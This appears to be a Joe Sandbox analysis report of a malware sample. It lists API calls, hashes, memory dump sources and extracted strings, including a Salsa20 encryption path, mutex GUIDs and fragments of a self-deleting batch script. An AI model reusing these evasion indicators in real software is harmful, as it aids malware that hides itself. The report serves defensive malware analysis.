                                                                                                                            • Instruction Fuzzy Hash: 3211EE71900219EBDB00DF59DC41BEFBBA8EF05314F104129FA28B7280D77A9A15CBD2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00E682A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcscmp.LIBCMT ref: 00E682B9
                                                                                                                            • _wcscmp.LIBCMT ref: 00E682CA
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00E68568,?,00000000), ref: 00E682E6
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00E68568,?,00000000), ref: 00E68310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_wcscmp
                                                                                                                            • String ID: ACP$OCP
                                                                                                                            • API String ID: 1351282208-711371036
                                                                                                                            • Opcode ID: 4ea700f374b93445f20cb757a19e476caeb299bdbea6fddd2265d6850b03a0c4
                                                                                                                            • Instruction ID: 049b24c693071c91492d36f4b8831aa509c742d3f71609de17e2816124919830
                                                                                                                            • Opcode Fuzzy Hash: 4ea700f374b93445f20cb757a19e476caeb299bdbea6fddd2265d6850b03a0c4
                                                                                                                            • Instruction Fuzzy Hash: AD01C4312C1505AAD7105E58ED09FD637D8AB05BD4F10A011F604FA4A0EF70DE40C795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00E3C090
                                                                                                                            • input != nullptr && output != nullptr, xrefs: 00E3C095
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wassert
                                                                                                                            • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                            • API String ID: 3993402318-1975116136
                                                                                                                            • Opcode ID: d1e30c5521de9760335f24bbf4c5b2c92e141fb939e0c6140d30f465ebb01cf5
                                                                                                                            • Instruction ID: dc86a8dc2204bc4668e28d0b0c9d2c1b0ec390f0adf4828f0e46c2d7da417531
                                                                                                                            • Opcode Fuzzy Hash: d1e30c5521de9760335f24bbf4c5b2c92e141fb939e0c6140d30f465ebb01cf5
                                                                                                                            • Instruction Fuzzy Hash: A7C19D75E002499FCB54CFA9C885ADEBBF1FF48304F24856AD919F7201E334AA458B54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E424E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00E424FE
                                                                                                                            • GetLastError.KERNEL32 ref: 00E42509
                                                                                                                            • CloseHandle.KERNEL32 ref: 00E4251C
                                                                                                                            • CloseHandle.KERNEL32 ref: 00E42539
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00E42550
                                                                                                                            • GetLastError.KERNEL32 ref: 00E4255B
                                                                                                                            • CloseHandle.KERNEL32 ref: 00E4256E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                            • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                            • API String ID: 2372642624-488272950
                                                                                                                            • Opcode ID: 46593d56e25eef4b980653addae411daf502114b8dab217239a6aae78d416306
                                                                                                                            • Instruction ID: 4fa2f7b2038efd13ba8efe08c2d9feefee39323f08d48b5009b75669630e0ab4
                                                                                                                            • Opcode Fuzzy Hash: 46593d56e25eef4b980653addae411daf502114b8dab217239a6aae78d416306
                                                                                                                            • Instruction Fuzzy Hash: BA714D7294021CABDB10DBA1ED89FEA77BCFB84315F600596F609E2090DF759A48CF61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E41900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 00E41915
                                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00E41932
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E41941
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E41948
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00E41956
                                                                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00E41962
                                                                                                                            • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00E41974
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00E4198B
                                                                                                                            • lstrcatW.KERNEL32(00000000,00F30260), ref: 00E41993
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00E41999
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00E419A3
                                                                                                                            • _memset.LIBCMT ref: 00E419B8
                                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00E419DC
                                                                                                                              • Part of subcall function 00E42BA0: lstrlenW.KERNEL32(?), ref: 00E42BC9
                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E41A01
                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00E41A04
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                            • String ID: failed with error
                                                                                                                            • API String ID: 4182478520-946485432
                                                                                                                            • Opcode ID: 7d0f7bb944fa13666e428373e3ae4f31506bd6b0a97be6b8391db4d557b06101
                                                                                                                            • Instruction ID: 831de35539b5e608bb56acacdb7bf65bee8ecbd2f9e729d96992f73ffaecf736
                                                                                                                            • Opcode Fuzzy Hash: 7d0f7bb944fa13666e428373e3ae4f31506bd6b0a97be6b8391db4d557b06101
                                                                                                                            • Instruction Fuzzy Hash: 3B21E131A40218BBEB116BA19C4AFBE3A78EBC5B11F300055FB05B2290DE746D49DBE5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00EB22E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E849A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00E84B72), ref: 00E849C7
                                                                                                                              • Part of subcall function 00E849A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00E849D7
                                                                                                                              • Part of subcall function 00E849A0: GetDesktopWindow.USER32 ref: 00E849FB
                                                                                                                              • Part of subcall function 00E849A0: GetProcessWindowStation.USER32(?,00E84B72), ref: 00E84A01
                                                                                                                              • Part of subcall function 00E849A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00E84B72), ref: 00E84A1C
                                                                                                                              • Part of subcall function 00E849A0: GetLastError.KERNEL32(?,00E84B72), ref: 00E84A2A
                                                                                                                              • Part of subcall function 00E849A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00E84B72), ref: 00E84A65
                                                                                                                              • Part of subcall function 00E849A0: _wcsstr.LIBCMT ref: 00E84A8A
                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EB2316
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00EB2323
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00EB2338
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00EB2341
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00EB234E
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00EB235C
                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00EB236E
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00EB23CA
                                                                                                                            • GetBitmapBits.GDI32(?,?,00000000), ref: 00EB23D6
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00EB2436
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00EB243D
                                                                                                                            • DeleteDC.GDI32(?), ref: 00EB244A
                                                                                                                            • DeleteDC.GDI32(?), ref: 00EB2450
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                            • API String ID: 151064509-1805842116
                                                                                                                            • Opcode ID: 36270c2661cb222132942eaa2951ed1fa5e6a0935101094f358d23dcaa09d9c4
                                                                                                                            • Instruction ID: f6a4674411825a10cd2abcaa3c296a1b95b372f55c97ab458a6541dc6ab5d01c
                                                                                                                            • Opcode Fuzzy Hash: 36270c2661cb222132942eaa2951ed1fa5e6a0935101094f358d23dcaa09d9c4
                                                                                                                            • Instruction Fuzzy Hash: B4417471544304EFD3205B759D46F6FBBF8EF89710F200919FA54A62E1EBB19805CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E935B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                            • API String ID: 909875538-2733969777
                                                                                                                            • Opcode ID: 45f34756941971bbd8e745e11b4b2ba9351c5f9d655e2321a9c0441fd577665a
                                                                                                                            • Instruction ID: 11e4f687b2a26af8d77cb5172cd3324d1a73d9a1ff6dfafda80a1b7e61ab7e4a
                                                                                                                            • Opcode Fuzzy Hash: 45f34756941971bbd8e745e11b4b2ba9351c5f9d655e2321a9c0441fd577665a
                                                                                                                            • Instruction Fuzzy Hash: C3F1D7B16483416BEB21EA74DC42F9BB7D89F54708F041829F98CF7283E6B4DA458793
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E55A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503006713-0
                                                                                                                            • Opcode ID: 36270333157a22404f63e4f0ad6e4f5f6c4b4709f6f5f8320792fbd73a300d38
                                                                                                                            • Instruction ID: 19a0970708fabc5660774651091c6f38fd2cb1e31a81a68333245c57c46903af
                                                                                                                            • Opcode Fuzzy Hash: 36270333157a22404f63e4f0ad6e4f5f6c4b4709f6f5f8320792fbd73a300d38
                                                                                                                            • Instruction Fuzzy Hash: 18212333108E01ABEB217F64DC56E4FBBE4DF41727B206C29FC84751A2EE219808CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E57B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DecodePointer.KERNEL32 ref: 00E57B29
                                                                                                                            • _free.LIBCMT ref: 00E57B42
                                                                                                                              • Part of subcall function 00E50BED: HeapFree.KERNEL32(00000000,00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000), ref: 00E50C01
                                                                                                                              • Part of subcall function 00E50BED: GetLastError.KERNEL32(00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000,?,?,?,?,?,00EFB3EC), ref: 00E50C13
                                                                                                                            • _free.LIBCMT ref: 00E57B55
                                                                                                                            • _free.LIBCMT ref: 00E57B73
                                                                                                                            • _free.LIBCMT ref: 00E57B85
                                                                                                                            • _free.LIBCMT ref: 00E57B96
                                                                                                                            • _free.LIBCMT ref: 00E57BA1
                                                                                                                            • _free.LIBCMT ref: 00E57BC5
                                                                                                                            • EncodePointer.KERNEL32(012E2590), ref: 00E57BCC
                                                                                                                            • _free.LIBCMT ref: 00E57BE1
                                                                                                                            • _free.LIBCMT ref: 00E57BF7
                                                                                                                            • _free.LIBCMT ref: 00E57C1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3064303923-0
                                                                                                                            • Opcode ID: 684c2da7d901e948bbe6202ccabc3e2da6a82e7e3c46685d081d7817111123ce
                                                                                                                            • Instruction ID: 668d2e808fb124097217a24b14bc37da173024a6665b7bbe461eaa0de3fc4cea
                                                                                                                            • Opcode Fuzzy Hash: 684c2da7d901e948bbe6202ccabc3e2da6a82e7e3c46685d081d7817111123ce
                                                                                                                            • Instruction Fuzzy Hash: 532191398086688BE760AF55FC80D1977A5EB1532A3141C3AFF84B7370CB746C99EB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E41B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00E41BB0
                                                                                                                            • CoCreateInstance.OLE32(00EFE908,00000000,00000001,00EFD568,00000000), ref: 00E41BC8
                                                                                                                            • CoUninitialize.OLE32 ref: 00E41BD0
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00E41C12
                                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00E41C22
                                                                                                                            • lstrcatW.KERNEL32(?,00F30050), ref: 00E41C3A
                                                                                                                            • lstrcatW.KERNEL32(?), ref: 00E41C44
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00E41C68
                                                                                                                            • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00E41C7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                            • String ID: \shell32.dll
                                                                                                                            • API String ID: 679253221-3783449302
                                                                                                                            • Opcode ID: 7b2cc68e27cda030aa8fdf3227ef1856ba176eb78294ddecff1ee9dc2b42aece
                                                                                                                            • Instruction ID: 67f9b67168a8d9abaa2103245f201a880609eef8f058dd793d0199c22667f4fe
                                                                                                                            • Opcode Fuzzy Hash: 7b2cc68e27cda030aa8fdf3227ef1856ba176eb78294ddecff1ee9dc2b42aece
                                                                                                                            • Instruction Fuzzy Hash: 62414E70A4021DAFDB14CBA4DC88FAA7BBCEF84744F1044D9F605EB150D6B0AE85CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E849A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00E84B72), ref: 00E849C7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00E849D7
                                                                                                                            • GetDesktopWindow.USER32 ref: 00E849FB
                                                                                                                            • GetProcessWindowStation.USER32(?,00E84B72), ref: 00E84A01
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00E84B72), ref: 00E84A1C
                                                                                                                            • GetLastError.KERNEL32(?,00E84B72), ref: 00E84A2A
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00E84B72), ref: 00E84A65
                                                                                                                            • _wcsstr.LIBCMT ref: 00E84A8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
